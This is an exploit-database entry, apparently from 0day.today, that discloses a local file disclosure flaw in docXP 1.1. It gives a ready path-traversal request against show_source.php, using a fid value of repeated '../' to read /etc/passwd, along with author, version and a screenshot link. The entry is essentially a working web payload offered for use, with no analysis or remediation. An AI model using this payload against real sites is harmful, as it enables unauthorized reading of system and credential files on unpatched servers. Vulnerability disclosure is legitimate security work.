id: 18962
date: 07/11/2012
title: docXP 1.1 => Local File Disclosure Vulnerability
author: GoLd_M
cves: 

# Exploit Title: docXP 1.1  => Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/docxp/
# Version: 1.1
# Category::  Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[docXP 1.1]/show_source.php?fid=../../../../../../../../../../../etc/passwd
# See Test :  http://upload.traidnt.net/upfiles/XrV27622.jpg



#  0day.today [2023-03-25]  #